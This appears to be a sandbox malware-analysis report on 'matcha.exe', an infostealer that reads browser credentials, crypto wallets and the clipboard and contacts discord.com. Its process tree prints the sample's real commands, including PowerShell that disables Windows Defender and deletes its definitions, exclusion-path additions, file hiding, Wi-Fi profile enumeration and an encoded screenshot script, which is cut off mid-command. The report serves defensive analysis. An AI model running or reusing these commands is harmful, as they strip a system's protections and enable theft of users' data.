e0051ec0211d9c8090d3a63038d74863094618a8e971ff1efc6ebf939615e8f4

Analysis

max time kernel
148s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
18-01-2025 19:34

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

matcha.exe
Size

7.1MB
MD5

0203b66c50fcda6ab03d559641782548
SHA1

cb83ab81c3d4e86b7adad7f114e6186dfd1e6c72
SHA256

e0051ec0211d9c8090d3a63038d74863094618a8e971ff1efc6ebf939615e8f4
SHA512

38f5dd652c4e9317d4dc52bc8e1408974b0bad17cebe9d6fd82661c881d4c82039d45ae42c4b051aa8a5dc781b4ae4adbbcb7bf52b8c486de3bc99191b669bc7
SSDEEP

98304:9DCIfhvpj/q5MD/x/0feyGgatbQ940BDlgwdnpka9R/k9t+2SzIrzUGt+EtMJbF2:9GOpj/bDfyGgqwBdnpkYRMsc8hJpWR19

Score

8^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4472	powershell.exe
4052	powershell.exe
4660	powershell.exe
3172	powershell.exe
2256	powershell.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	matcha.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
4348	cmd.exe
2088	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
3088	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
3100	matcha.exe
3100	matcha.exe
3100	matcha.exe
3100	matcha.exe
3100	matcha.exe
3100	matcha.exe
3100	matcha.exe
3100	matcha.exe
3100	matcha.exe
3100	matcha.exe
3100	matcha.exe
3100	matcha.exe
3100	matcha.exe
3100	matcha.exe
3100	matcha.exe
3100	matcha.exe
3100	matcha.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
26	discord.com
27	discord.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
9	ip-api.com
24	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 5 IoCs

discovery

Process Discovery

T1057

pid	Process
432	tasklist.exe
4004	tasklist.exe
4912	tasklist.exe
4268	tasklist.exe
3252	tasklist.exe

Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
4136	cmd.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
3944	cmd.exe
3648	PING.EXE

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
3624	netsh.exe
1936	cmd.exe

Detects videocard installed 1 TTPs 3 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
1072	WMIC.exe
1048	WMIC.exe
4192	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
5096	systeminfo.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
3648	PING.EXE

Suspicious behavior: EnumeratesProcesses 20 IoCs

pid	Process
4052	powershell.exe
2256	powershell.exe
2256	powershell.exe
4052	powershell.exe
3172	powershell.exe
3172	powershell.exe
2088	powershell.exe
2088	powershell.exe
4400	powershell.exe
4400	powershell.exe
2088	powershell.exe
4400	powershell.exe
4660	powershell.exe
4660	powershell.exe
4592	powershell.exe
4592	powershell.exe
4472	powershell.exe
4472	powershell.exe
2332	powershell.exe
2332	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4052	powershell.exe
Token: SeDebugPrivilege	2256	powershell.exe
Token: SeDebugPrivilege	432	tasklist.exe
Token: SeIncreaseQuotaPrivilege	3964	WMIC.exe
Token: SeSecurityPrivilege	3964	WMIC.exe
Token: SeTakeOwnershipPrivilege	3964	WMIC.exe
Token: SeLoadDriverPrivilege	3964	WMIC.exe
Token: SeSystemProfilePrivilege	3964	WMIC.exe
Token: SeSystemtimePrivilege	3964	WMIC.exe
Token: SeProfSingleProcessPrivilege	3964	WMIC.exe
Token: SeIncBasePriorityPrivilege	3964	WMIC.exe
Token: SeCreatePagefilePrivilege	3964	WMIC.exe
Token: SeBackupPrivilege	3964	WMIC.exe
Token: SeRestorePrivilege	3964	WMIC.exe
Token: SeShutdownPrivilege	3964	WMIC.exe
Token: SeDebugPrivilege	3964	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3964	WMIC.exe
Token: SeRemoteShutdownPrivilege	3964	WMIC.exe
Token: SeUndockPrivilege	3964	WMIC.exe
Token: SeManageVolumePrivilege	3964	WMIC.exe
Token: 33	3964	WMIC.exe
Token: 34	3964	WMIC.exe
Token: 35	3964	WMIC.exe
Token: 36	3964	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3964	WMIC.exe
Token: SeSecurityPrivilege	3964	WMIC.exe
Token: SeTakeOwnershipPrivilege	3964	WMIC.exe
Token: SeLoadDriverPrivilege	3964	WMIC.exe
Token: SeSystemProfilePrivilege	3964	WMIC.exe
Token: SeSystemtimePrivilege	3964	WMIC.exe
Token: SeProfSingleProcessPrivilege	3964	WMIC.exe
Token: SeIncBasePriorityPrivilege	3964	WMIC.exe
Token: SeCreatePagefilePrivilege	3964	WMIC.exe
Token: SeBackupPrivilege	3964	WMIC.exe
Token: SeRestorePrivilege	3964	WMIC.exe
Token: SeShutdownPrivilege	3964	WMIC.exe
Token: SeDebugPrivilege	3964	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3964	WMIC.exe
Token: SeRemoteShutdownPrivilege	3964	WMIC.exe
Token: SeUndockPrivilege	3964	WMIC.exe
Token: SeManageVolumePrivilege	3964	WMIC.exe
Token: 33	3964	WMIC.exe
Token: 34	3964	WMIC.exe
Token: 35	3964	WMIC.exe
Token: 36	3964	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1072	WMIC.exe
Token: SeSecurityPrivilege	1072	WMIC.exe
Token: SeTakeOwnershipPrivilege	1072	WMIC.exe
Token: SeLoadDriverPrivilege	1072	WMIC.exe
Token: SeSystemProfilePrivilege	1072	WMIC.exe
Token: SeSystemtimePrivilege	1072	WMIC.exe
Token: SeProfSingleProcessPrivilege	1072	WMIC.exe
Token: SeIncBasePriorityPrivilege	1072	WMIC.exe
Token: SeCreatePagefilePrivilege	1072	WMIC.exe
Token: SeBackupPrivilege	1072	WMIC.exe
Token: SeRestorePrivilege	1072	WMIC.exe
Token: SeShutdownPrivilege	1072	WMIC.exe
Token: SeDebugPrivilege	1072	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1072	WMIC.exe
Token: SeRemoteShutdownPrivilege	1072	WMIC.exe
Token: SeUndockPrivilege	1072	WMIC.exe
Token: SeManageVolumePrivilege	1072	WMIC.exe
Token: 33	1072	WMIC.exe
Token: 34	1072	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3956 wrote to memory of 3100	3956	matcha.exe	83
PID 3956 wrote to memory of 3100	3956	matcha.exe	83
PID 3100 wrote to memory of 2696	3100	matcha.exe	84
PID 3100 wrote to memory of 2696	3100	matcha.exe	84
PID 3100 wrote to memory of 4456	3100	matcha.exe	85
PID 3100 wrote to memory of 4456	3100	matcha.exe	85
PID 3100 wrote to memory of 4960	3100	matcha.exe	88
PID 3100 wrote to memory of 4960	3100	matcha.exe	88
PID 3100 wrote to memory of 4928	3100	matcha.exe	90
PID 3100 wrote to memory of 4928	3100	matcha.exe	90
PID 4456 wrote to memory of 4052	4456	cmd.exe	92
PID 4456 wrote to memory of 4052	4456	cmd.exe	92
PID 2696 wrote to memory of 2256	2696	cmd.exe	93
PID 2696 wrote to memory of 2256	2696	cmd.exe	93
PID 4960 wrote to memory of 432	4960	cmd.exe	94
PID 4960 wrote to memory of 432	4960	cmd.exe	94
PID 4928 wrote to memory of 3964	4928	cmd.exe	95
PID 4928 wrote to memory of 3964	4928	cmd.exe	95
PID 3100 wrote to memory of 2616	3100	matcha.exe	166
PID 3100 wrote to memory of 2616	3100	matcha.exe	166
PID 2616 wrote to memory of 224	2616	cmd.exe	99
PID 2616 wrote to memory of 224	2616	cmd.exe	99
PID 3100 wrote to memory of 5052	3100	matcha.exe	100
PID 3100 wrote to memory of 5052	3100	matcha.exe	100
PID 5052 wrote to memory of 2300	5052	cmd.exe	102
PID 5052 wrote to memory of 2300	5052	cmd.exe	102
PID 3100 wrote to memory of 636	3100	matcha.exe	103
PID 3100 wrote to memory of 636	3100	matcha.exe	103
PID 636 wrote to memory of 1072	636	cmd.exe	146
PID 636 wrote to memory of 1072	636	cmd.exe	146
PID 3100 wrote to memory of 2736	3100	matcha.exe	106
PID 3100 wrote to memory of 2736	3100	matcha.exe	106
PID 2736 wrote to memory of 1048	2736	cmd.exe	108
PID 2736 wrote to memory of 1048	2736	cmd.exe	108
PID 3100 wrote to memory of 4136	3100	matcha.exe	109
PID 3100 wrote to memory of 4136	3100	matcha.exe	109
PID 3100 wrote to memory of 1096	3100	matcha.exe	111
PID 3100 wrote to memory of 1096	3100	matcha.exe	111
PID 1096 wrote to memory of 3172	1096	cmd.exe	113
PID 1096 wrote to memory of 3172	1096	cmd.exe	113
PID 4136 wrote to memory of 928	4136	cmd.exe	114
PID 4136 wrote to memory of 928	4136	cmd.exe	114
PID 3100 wrote to memory of 4408	3100	matcha.exe	115
PID 3100 wrote to memory of 4408	3100	matcha.exe	115
PID 3100 wrote to memory of 1248	3100	matcha.exe	116
PID 3100 wrote to memory of 1248	3100	matcha.exe	116
PID 1248 wrote to memory of 4004	1248	cmd.exe	120
PID 1248 wrote to memory of 4004	1248	cmd.exe	120
PID 4408 wrote to memory of 4912	4408	cmd.exe	121
PID 4408 wrote to memory of 4912	4408	cmd.exe	121
PID 3100 wrote to memory of 4508	3100	matcha.exe	122
PID 3100 wrote to memory of 4508	3100	matcha.exe	122
PID 3100 wrote to memory of 4348	3100	matcha.exe	124
PID 3100 wrote to memory of 4348	3100	matcha.exe	124
PID 3100 wrote to memory of 1272	3100	matcha.exe	125
PID 3100 wrote to memory of 1272	3100	matcha.exe	125
PID 3100 wrote to memory of 3968	3100	matcha.exe	128
PID 3100 wrote to memory of 3968	3100	matcha.exe	128
PID 3100 wrote to memory of 1936	3100	matcha.exe	130
PID 3100 wrote to memory of 1936	3100	matcha.exe	130
PID 3100 wrote to memory of 3996	3100	matcha.exe	131
PID 3100 wrote to memory of 3996	3100	matcha.exe	131
PID 3100 wrote to memory of 4000	3100	matcha.exe	133
PID 3100 wrote to memory of 4000	3100	matcha.exe	133

Views/modifies file attributes 1 TTPs 3 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
928	attrib.exe
4108	attrib.exe
2016	attrib.exe

C:\Users\Admin\AppData\Local\Temp\matcha.exe
"C:\Users\Admin\AppData\Local\Temp\matcha.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3956
- C:\Users\Admin\AppData\Local\Temp\matcha.exe
  "C:\Users\Admin\AppData\Local\Temp\matcha.exe"
  2⤵
  - Drops file in Drivers directory
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:3100
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\matcha.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2696
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\matcha.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2256
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4456
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4052
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4960
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:432
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4928
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3964
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2616
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      PID:224
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5052
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      PID:2300
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:636
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious use of AdjustPrivilegeToken
      PID:1072
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2736
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:1048
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\matcha.exe""
    3⤵
    - Hide Artifacts: Hidden Files and Directories
    - Suspicious use of WriteProcessMemory
    PID:4136
  - - C:\Windows\system32\attrib.exe
      attrib +h +s "C:\Users\Admin\AppData\Local\Temp\matcha.exe"
      4⤵
      Views/modifies file attributes
      PID:928
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\  .scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1096
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\  .scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:3172
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4408
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:4912
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1248
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:4004
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    PID:4508
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      PID:4984
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    PID:4348
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      PID:2088
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:1272
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:4268
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:3968
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:808
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:1936
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:3624
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:3996
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:5096
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    PID:4000
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:368
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    PID:4120
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAg